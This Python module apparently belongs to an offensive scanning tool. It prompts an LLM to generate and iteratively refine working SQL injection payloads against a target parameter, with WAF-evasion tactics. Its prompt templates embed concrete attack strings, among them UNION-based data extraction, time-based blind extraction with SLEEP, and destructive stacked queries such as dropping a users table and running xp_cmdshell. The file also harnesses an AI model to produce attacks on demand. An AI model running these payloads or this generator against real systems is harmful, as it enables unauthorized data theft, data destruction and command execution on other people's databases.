"""
LLM-Based Payload Engine for SQL Injection
Pure LLM-driven SQLi payload generation with no rule-based fallbacks

Novel contribution: LLM understanding of SQL context and database-specific syntax
"""

import logging
import json
from typing import List, Dict, Optional
from dataclasses import dataclass
from enum import Enum


logger = logging.getLogger(__name__)


class SQLContext(Enum):
    """SQL query contexts where injection can occur"""
    WHERE_CLAUSE = "where_clause"
    LIKE_CLAUSE = "like_clause"
    ORDER_BY = "order_by"
    LIMIT_CLAUSE = "limit"
    INSERT_VALUES = "insert_values"
    UPDATE_SET = "update_set"
    IN_CLAUSE = "in_clause"
    HAVING_CLAUSE = "having"
    UNKNOWN = "unknown"


class DatabaseType(Enum):
    """Detected database types"""
    MYSQL = "mysql"
    POSTGRESQL = "postgresql"
    MSSQL = "mssql"
    ORACLE = "oracle"
    SQLITE = "sqlite"
    MARIADB = "mariadb"
    UNKNOWN = "unknown"


class SQLiTechnique(Enum):
    """SQLi exploitation techniques"""
    ERROR_BASED = "error_based"
    TIME_BASED_BLIND = "time_based_blind"
    BOOLEAN_BASED_BLIND = "boolean_based_blind"
    UNION_BASED = "union_based"
    STACKED_QUERIES = "stacked_queries"
    OUT_OF_BAND = "out_of_band"


@dataclass
class SQLiPayload:
    """A SQL injection payload generated by LLM"""
    payload: str
    reasoning: str
    confidence: float
    technique: SQLiTechnique
    database_type: DatabaseType
    expected_behavior: str
    detection_method: str
    bypass_strategy: Optional[str] = None


@dataclass
class SQLiContext:
    """Context information for SQL injection"""
    parameter: str
    original_value: str
    baseline_response: str
    error_messages: List[str]
    response_time: float
    database_type: Optional[DatabaseType] = None
    sql_context: SQLContext = SQLContext.UNKNOWN
    waf_detected: bool = False
    blocked_keywords: List[str] = None


class LLMSQLiEngine:
    """
    Pure LLM-based SQL injection payload generation

    No hardcoded payloads, no rules - just LLM intelligence
    """

    def __init__(self, llm_client, cost_tracker=None):
        self.llm_client = llm_client
        self.cost_tracker = cost_tracker
        self.logger = logging.getLogger(__name__)

    async def generate_sqli_payloads(self,
                                    context: SQLiContext,
                                    technique: SQLiTechnique,
                                    num_payloads: int = 10) -> List[SQLiPayload]:
        """
        Generate SQL injection payloads based on detected context

        Args:
            context: Information about the injection point
            technique: Which SQLi technique to use
            num_payloads: Number of payloads to generate

        Returns:
            List of generated SQLi payloads
        """
        self.logger.info(f"Generating {num_payloads} {technique.value} payloads")
        self.logger.info(f"Database: {context.database_type.value if context.database_type else 'unknown'}")
        self.logger.info(f"SQL Context: {context.sql_context.value}")

        prompt = self._build_sqli_generation_prompt(context, technique, num_payloads)

        try:
            response = await self._call_llm(
                prompt=prompt,
                component="LLMSQLiEngine",
                purpose=f"sqli_{technique.value}_generation"
            )

            payloads = self._parse_llm_response(response, technique, context.database_type or DatabaseType.UNKNOWN)

            self.logger.info(f"Successfully generated {len(payloads)} SQLi payloads")
            return payloads

        except Exception as e:
            self.logger.error(f"Error generating SQLi payloads: {e}")
            return []

    def _build_sqli_generation_prompt(self,
                                     context: SQLiContext,
                                     technique: SQLiTechnique,
                                     num_payloads: int) -> str:
        """Build comprehensive prompt for SQLi payload generation"""

        prompt = f"""You are an expert database security researcher specializing in SQL injection exploitation.

TASK: Generate {num_payloads} SQL injection payloads using {technique.value} technique.

## TARGET CONTEXT

**Parameter**: {context.parameter}
**Original Value**: {context.original_value}
**Baseline Response Time**: {context.response_time:.3f}s

"""

        # Add database-specific information
        if context.database_type:
            prompt += f"**Detected Database**: {context.database_type.value}\n"

        if context.sql_context != SQLContext.UNKNOWN:
            prompt += f"**SQL Context**: {context.sql_context.value}\n"

        if context.error_messages:
            prompt += "\n**Error Messages Observed**:\n"
            for err in context.error_messages[:5]:  # Limit to 5
                prompt += f"  - {err}\n"

        if context.waf_detected:
            prompt += "\n⚠️  **WAF/IPS Detected** - Evasion techniques required\n"

        if context.blocked_keywords:
            prompt += f"\n🚫 **Blocked Keywords**: {', '.join(context.blocked_keywords)}\n"

        # Add technique-specific guidance
        prompt += f"\n## TECHNIQUE: {technique.value.upper()}\n\n"

        if technique == SQLiTechnique.ERROR_BASED:
            prompt += """**Error-Based SQL Injection**:
- Force database errors that reveal information in error messages
- Use type conversion errors, division by zero, xpath errors
- Extract data through error messages
- Database-specific error functions:
  * MySQL: extractvalue(), updatexml(), exp()
  * PostgreSQL: cast(), ::int
  * MSSQL: convert(), cast()
  * Oracle: utl_inaddr.get_host_address()

Example flow:
1. Break query with quote: '
2. Inject error function: ' AND extractvalue(1,concat(0x7e,version()))--
3. Error reveals version in message
"""

        elif technique == SQLiTechnique.TIME_BASED_BLIND:
            prompt += """**Time-Based Blind SQL Injection**:
- Cause conditional delays in query execution
- If condition true, delay occurs; if false, no delay
- Extract data bit by bit through timing
- Database-specific sleep functions:
  * MySQL: SLEEP(5), BENCHMARK(10000000,MD5(1))
  * PostgreSQL: pg_sleep(5)
  * MSSQL: WAITFOR DELAY '00:00:05'
  * Oracle: dbms_pipe.receive_message('x',5)
  * SQLite: randomblob(100000000)

Example flow:
1. Test for vulnerability: ' AND SLEEP(5)--
2. Extract data: ' AND IF(ASCII(SUBSTRING(version(),1,1))>100,SLEEP(5),0)--
3. Binary search through ASCII values
"""

        elif technique == SQLiTechnique.BOOLEAN_BASED_BLIND:
            prompt += """**Boolean-Based Blind SQL Injection**:
- Inject conditions that change page behavior (true vs false)
- Compare response content, length, or status
- Extract data through conditional logic
- Use AND/OR logic to test conditions

Example flow:
1. Test true condition: ' AND 1=1--
2. Test false condition: ' AND 1=2--
3. Extract data: ' AND ASCII(SUBSTRING(version(),1,1))>100--
4. Binary search through values
"""

        elif technique == SQLiTechnique.UNION_BASED:
            prompt += """**Union-Based SQL Injection**:
- Use UNION SELECT to append our query results
- Must match column count and data types
- Can directly extract data in response
- Most powerful when successful

Example flow:
1. Determine column count: ' ORDER BY 10-- (binary search)
2. Find injectable columns: ' UNION SELECT 1,2,3,4,5--
3. Extract data: ' UNION SELECT null,version(),database(),user(),null--
4. Enumerate tables/columns
"""

        elif technique == SQLiTechnique.STACKED_QUERIES:
            prompt += """**Stacked Queries**:
- Execute multiple SQL statements (if supported)
- Separated by semicolon: ;
- Can perform INSERT, UPDATE, DELETE
- Not supported by all databases/drivers

Example:
'; DROP TABLE users--
'; EXEC xp_cmdshell('whoami')--
"""

        # Add database-specific syntax
        if context.database_type:
            prompt += self._get_database_specific_syntax(context.database_type)

        # Add WAF bypass strategies
        if context.waf_detected:
            prompt += """
## WAF BYPASS STRATEGIES

1. **Case Variation**: SELECT vs SeLeCt vs sElEcT
2. **Comment Injection**: SEL/**/ECT, SE/*comment*/LECT
3. **Whitespace Variation**: Use tabs, newlines, form feeds
4. **Encoding**: URL encoding, double encoding, hex encoding
5. **Alternative Keywords**:
   - AND → &&
   - OR → ||
   - = → LIKE
6. **Function Alternatives**:
   - SLEEP() → BENCHMARK()
   - SUBSTRING() → MID(), SUBSTR(), LEFT(), RIGHT()
7. **Null Bytes**: SELECT%00FROM
8. **Scientific Notation**: 1e0, 1.e1
9. **String Concatenation**:
   - MySQL: CONCAT('a','b')
   - MSSQL: 'a'+'b'
   - Oracle: 'a'||'b'
"""

        prompt += f"""
## REQUIREMENTS

Generate exactly {num_payloads} SQL injection payloads in JSON format.

For each payload:
1. **payload**: The actual SQLi payload string
2. **reasoning**: Why this payload should work (2-3 sentences)
3. **confidence**: Confidence this will work (0.0 to 1.0)
4. **expected_behavior**: What should happen when this payload executes
5. **detection_method**: How to detect if it worked
6. **bypass_strategy**: If WAF detected, explain evasion technique used

## IMPORTANT CONSTRAINTS

1. **Match the database type**: Use correct syntax for detected database
2. **Match the SQL context**: Consider WHERE vs INSERT vs ORDER BY
3. **Respect the technique**: Generate payloads for {technique.value} only
4. **Progressive complexity**: Start simple, get more sophisticated
5. **WAF evasion**: If WAF detected, apply evasion techniques
6. **Practical exploitation**: Payloads must actually work in real scenarios

## OUTPUT FORMAT

Respond with ONLY valid JSON (no markdown):

```json
{{
  "payloads": [
    {{
      "payload": "actual payload here",
      "reasoning": "explanation of why this works",
      "confidence": 0.85,
      "expected_behavior": "what happens when executed",
      "detection_method": "how to verify it worked",
      "bypass_strategy": "evasion techniques used (if applicable)"
    }},
    ...
  ]
}}
```

Generate diverse payloads. Think step by step about SQL parsing and execution.
"""

        return prompt

    def _get_database_specific_syntax(self, db_type: DatabaseType) -> str:
        """Get database-specific SQL syntax hints"""

        if db_type == DatabaseType.MYSQL:
            return """
## MySQL-Specific Syntax

- Comment styles: --, #, /**/
- String concat: CONCAT(), CONCAT_WS()
- Version: VERSION(), @@VERSION
- Database: DATABASE()
- User: USER(), CURRENT_USER()
- Sleep: SLEEP(n), BENCHMARK()
- Substring: SUBSTRING(), MID(), SUBSTR()
- Error functions: extractvalue(), updatexml()
- Information schema: information_schema.tables, information_schema.columns
"""

        elif db_type == DatabaseType.POSTGRESQL:
            return """
## PostgreSQL-Specific Syntax

- Comment: --, /**/
- String concat: ||, CONCAT()
- Version: VERSION()
- Database: current_database()
- User: current_user, user
- Sleep: pg_sleep(n)
- Substring: SUBSTRING()
- Cast: ::type syntax
- Error: CAST('x' AS INTEGER)
"""

        elif db_type == DatabaseType.MSSQL:
            return """
## MS SQL Server-Specific Syntax

- Comment: --, /**/
- String concat: +
- Version: @@VERSION
- Database: DB_NAME()
- User: SYSTEM_USER, USER_NAME()
- Sleep: WAITFOR DELAY '00:00:05'
- Substring: SUBSTRING()
- System tables: sys.databases, sys.tables, sys.columns
- Command execution: xp_cmdshell (if enabled)
"""

        elif db_type == DatabaseType.ORACLE:
            return """
## Oracle-Specific Syntax

- Comment: --, /**/
- String concat: ||, CONCAT()
- Version: banner FROM v$version
- Database: SYS.DATABASE_NAME
- User: USER, SYS_CONTEXT('USERENV','SESSION_USER')
- Sleep: dbms_pipe.receive_message('x',5)
- Substring: SUBSTR()
- All tables: all_tables, user_tables
- From dual: Required in SELECT statements
"""

        return ""

    async def _call_llm(self, prompt: str, component: str, purpose: str) -> str:
        """Call LLM with cost tracking"""
        try:
            messages = [{"role": "user", "content": prompt}]

            from ..xss_agent.llm_client import get_default_model
            model = get_default_model()

            response = self.llm_client.chat_completion(
                model=model,
                messages=messages,
                max_tokens=4000,
                temperature=0.7,
                component=component,
                purpose=purpose
            )

            return response["choices"][0]["message"]["content"]

        except Exception as e:
            self.logger.error(f"LLM call failed: {e}")
            raise

    def _parse_llm_response(self,
                           response: str,
                           technique: SQLiTechnique,
                           db_type: DatabaseType) -> List[SQLiPayload]:
        """Parse LLM JSON response into SQLiPayload objects"""
        try:
            # Clean response
            response = response.strip()
            if response.startswith("```json"):
                response = response[7:]
            if response.startswith("```"):
                response = response[3:]
            if response.endswith("```"):
                response = response[:-3]
            response = response.strip()

            # Parse JSON
            data = json.loads(response)

            payloads = []
            for item in data.get("payloads", []):
                payload = SQLiPayload(
                    payload=item.get("payload", ""),
                    reasoning=item.get("reasoning", ""),
                    confidence=float(item.get("confidence", 0.5)),
                    technique=technique,
                    database_type=db_type,
                    expected_behavior=item.get("expected_behavior", ""),
                    detection_method=item.get("detection_method", ""),
                    bypass_strategy=item.get("bypass_strategy")
                )
                payloads.append(payload)

            return payloads

        except json.JSONDecodeError as e:
            self.logger.error(f"Failed to parse LLM JSON response: {e}")
            self.logger.error(f"Response was: {response[:500]}")
            return []
        except Exception as e:
            self.logger.error(f"Error parsing LLM response: {e}")
            return []

    async def refine_payload(self,
                           failed_payload: str,
                           context: SQLiContext,
                           technique: SQLiTechnique,
                           failure_reason: str) -> List[SQLiPayload]:
        """Refine a failed SQLi payload"""

        prompt = f"""You are analyzing a failed SQL injection attempt.

## FAILED PAYLOAD

**Payload**: {failed_payload}
**Technique**: {technique.value}
**Database**: {context.database_type.value if context.database_type else 'unknown'}

## FAILURE REASON

{failure_reason}

## CONTEXT

**Parameter**: {context.parameter}
**Baseline Response Time**: {context.response_time:.3f}s

## TASK

Analyze why this payload failed and generate 5 IMPROVED payloads.

Consider:
1. Was syntax incorrect for database type?
2. Did it trigger WAF?
3. Is the SQL context wrong?
4. Are there encoding issues?
5. Did timing/boolean test fail?

Output JSON with 5 improved payloads (same format as before).
"""

        try:
            response = await self._call_llm(
                prompt=prompt,
                component="LLMSQLiEngine",
                purpose="sqli_refinement"
            )

            payloads = self._parse_llm_response(response, technique, context.database_type or DatabaseType.UNKNOWN)
            self.logger.info(f"Generated {len(payloads)} refined SQLi payloads")
            return payloads

        except Exception as e:
            self.logger.error(f"Error refining SQLi payload: {e}")
            return []
